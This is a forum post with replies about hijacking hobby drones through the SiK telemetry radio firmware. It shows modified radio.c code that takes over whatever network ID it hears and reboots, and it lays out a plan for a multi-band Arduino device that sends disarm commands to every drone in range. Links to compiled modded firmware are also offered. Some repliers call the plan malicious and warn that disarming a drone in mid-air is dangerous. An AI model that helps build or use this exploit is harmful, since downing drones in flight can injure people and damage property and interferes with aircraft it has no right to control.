HopeRF-TRP 3DR MavLink Attack


Project Status;          Design

Project Progress;       [∎∎∎                       ]


Once the project is complete I will be publishing it here


My write-up on my Blog www.googlex.co.uk/blog...


Hello DiyDrone.com Community!


My name is Jack and I'm currently working on a project to do with an exploit recently discovered (Oct 2015) in the MavLink Protocol.

First off, the exploit:

The exploit is to do with the radios' method of authentication. They use the header 'Net_Id' to identify themselves to the other radios during transmission of data.

Within the SiK firmware for the SiLabs Si1000 ISM radio there is a file named "radio.c". Within this file there is some code that pulls the device's 'Net_Id' and checks it against incoming data packets to check if they are meant for the radio that is receiving them.

This is the original code:


    // decode the header
    errcount = golay_decode(6, buf, gout);
    if (gout[0] != netid[0] || gout[1] != netid[1]) {
        // its not for our network ID
        debug("netid %x %x\n",
              (unsigned)gout[0],
              (unsigned)gout[1]);
        goto failed;
    }

However, some guy has been able to modify this code so that when the radio receives a data packet it reads its 'Net_Id' and sets the 'Net_Id' of the radio that received the packet to the same as the one that was just received. Then the radio is able to issue a command to the drone that it has just stolen the 'Net_Id' from, such as "CMD_DISARM", which would in turn disarm the drone mid-flight!

Here is the "Modified" code:


    // decode the header
    errcount = golay_decode(6, buf, gout);
    if (gout[0] != netid[0] || gout[1] != netid[1]) {
        // its not for our network ID
        /* Mod */
        // Set our radio to use the captured packets
        NetID param_set(PARAM_NETID, gout[0]))
        // Save the value to flash
        param_save();
        // To read the new value we need to reboot. Rebooting
        RSTSRC |= (1 << 4);
        /* End of Mod*/
    }

My problem(s) are as follows.

I can't compile the modded firmware as all of my Linux computers refuse to install MonoDevelop :/
I would like to have this running on a standalone HopeRF HM-TRP 433 chip that is connected to an Arduino. The Arduino would have a display that, when a button is pressed, shows something like LINE1 "Drone-B-Gone" LINE2 "Disarming all drones in the area!", and the Arduino would use Serial.Send() to send the command to the HopeRF chip that contains the packet "CMD_DISARM" that would disarm the quad in flight.
I have no way of flashing the HopeRF HM-TRP chip! I read somewhere that an Arduino Uno could be used, however I have lost that link :(
I have NO Arduino experience so I don't even know how I would start coding something like this.


And now for my questions!
1. Can I link several HopeRF HM-TRP modules together?? What I mean by this is, could I possibly have 434/868/915 modules with the modded code all linked together with the Tx and Rx pins and the same power source (DUH, with different antennas) so that when the button is pressed, no matter what telemetry band the drone is using, it WILL cover it?
2. Can someone please send me in the right direction on how I can achieve what I have asked above with an Arduino??

All help is greatly appreciated!

Links to prior Research

http://madhacker.org/how-to-hijack-a-drone-by-telemetry-and-prevent-it/

https://github.com/Dronecode/SiK

http://www.shellntel.com/blog/2015/9/25/drone-code-execution

http://rc-fpv.pl/viewtopic.php?t=8011

Obviously I am not doing this with malicious intent... ;)

Thanks a lot guys!!!

Peace out ~Jack
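An added example, written for this thread and not code from the SiK project or from the poster: a C model of the radio.c NETID check quoted above. It shows that the check is a plain comparison of two clear-text header bytes against the radio's configured NETID, which is why the replies below describe NET IDs as network selection rather than a security feature. Assumptions: the decoded header is 3 bytes, with the NETID low byte in gout[0] and the high byte in gout[1]; the sample frames and NETID values are constructed.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Stand-in for the 3-byte header that golay_decode(6, buf, gout) yields.
 * gout[0], gout[1]: NETID bytes; gout[2]: remaining header byte (assumed). */
typedef struct {
    uint8_t gout[3];
} decoded_header_t;

/* Mirrors the firmware's filter: accept only if both NETID bytes match.
 * Nothing here depends on a secret, so the decision is a routing choice,
 * not an authentication of the sender. */
bool netid_filter_accepts(const decoded_header_t *hdr, uint16_t our_netid)
{
    uint8_t netid[2] = { (uint8_t)(our_netid & 0xFF), (uint8_t)(our_netid >> 8) };
    return hdr->gout[0] == netid[0] && hdr->gout[1] == netid[1];
}

/* Build a header for a given NETID (constructed helper, not SiK code). */
decoded_header_t make_header(uint16_t netid, uint8_t third_byte)
{
    decoded_header_t h;
    h.gout[0] = (uint8_t)(netid & 0xFF);
    h.gout[1] = (uint8_t)(netid >> 8);
    h.gout[2] = third_byte;
    return h;
}

/* Count how many of the given frames a radio on our_netid would accept. */
int count_accepted(const decoded_header_t *frames, int n, uint16_t our_netid)
{
    int accepted = 0;
    for (int i = 0; i < n; i++)
        if (netid_filter_accepts(&frames[i], our_netid))
            accepted++;
    return accepted;
}

int main(void)
{
    /* Constructed sample: our radio is on NETID 25; the air carries frames
     * for NETIDs 25, 26, 0x0119 (same low byte, different high byte) and 25. */
    decoded_header_t frames[] = { make_header(25, 4), make_header(26, 4),
                                  make_header(0x0119, 4), make_header(25, 7) };
    int n = (int)(sizeof frames / sizeof frames[0]);
    printf("accepted %d of %d frames\n", count_accepted(frames, n, 25), n);
    return 0;
}
```

Every frame whose two header bytes equal the configured value passes, whoever sent it; the byte-order case (0x0119 vs 25) shows the check is exact on both bytes, not just the low one.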

<-------------------------------- UPDATE-1 ----------------------------------->

Having second thoughts on how I should do this,

I am pondering as to whether I should use an Android tablet with the USB OTG wire.

This way (as Andre K pointed out) I would be showing more skills, as I am a confident Android developer, so I could possibly make my own app that gives me a multitude of functions such as Follow Me, Disable, Manual Control, RTH/RTL, Set new home and go there; also I could do flight mode change. I think this would possibly help me demonstrate more skills?

What do you guys think? Start your response with UPDATE-1 ;)

~Jack

<------------------------------ UPDATE-1 END ------------------------------->

<-------------------------------- UPDATE-2 ----------------------------------->

Finally getting somewhere!

A HUGE Thanks to Marcin Krawczyk for recommending Fedora to me!

I have finally got the HM_TRP firmware package compiled :)

It is attached below. This is the FW WITH the mod :)

LINK TO FW FILE  <-- Not the correct upload!

I pulled an all-nighter doing this :S

~Jack

===

SUB UPDATE!

I accidentally uploaded the wrong file; this is the full dst output file :)

LINK TO FW FILE

===

<------------------------------ UPDATE-2 END ------------------------------->


By Jack Rogers


© InkyHacker 2016


hm_trp.zip

Firmware.zip

Replies

      • <Sarcasm>

        Wooo I LOVE LINUX!

        </Sarcasm>

        Crashed every time (3 times) when I tried to compile >:(

        Now installing it all on a physical machine instead of using a VM :)

    • I MEANT UART NOT SERIAL ;/

  • I think there's nothing to exploit as the firmware has been designed without security in mind. The NET IDs are not for security reasons.

    While the lack of security might be a concern it's not by accident - it is entirely intentional. Choose another topic for your project.

    • I agree, depending on the knowledge/skill level you wish to demonstrate, the project may be too easy.

      The main reason behind the lack of security is that the radio does not have a lot of processing power, so proper encryption, with fast recovery and the ability to handle packet loss, is difficult to implement.

  • This attempt is way too malicious to be necessary to demonstrate a security risk as part of a project.

    No decent white-hat hacker would contribute to posting anything like the description says in working condition, as it's simply overkill for purposes other than evil :)

    You can prove your point by just issuing a harmless command, or changing an unimportant parameter by 5%; no need for multiple frequencies and disarming.

    I have been contacted by several people with big commercial ideas for similar "drone-inhibiting" devices. The main problem is that nobody with such a device actually knows the difference between legal/approved operations and the other, and mid-air disarming/even LAND may just as well cause more dangerous situations than continued flight.

  • You should talk with Tridge directly.
    • Sorry for sounding dumb here, but who is Tridge?

      ~Jack

      • https://en.m.wikipedia.org/wiki/Andrew_Tridgell
        His nickname is Tridge. He's the father of SiK firmware and APM mentor ;-) and leading developer.
        • Hmmm, I see. Now how would one go about contacting him, I wonder??

          • I have notified him about this thread. :)
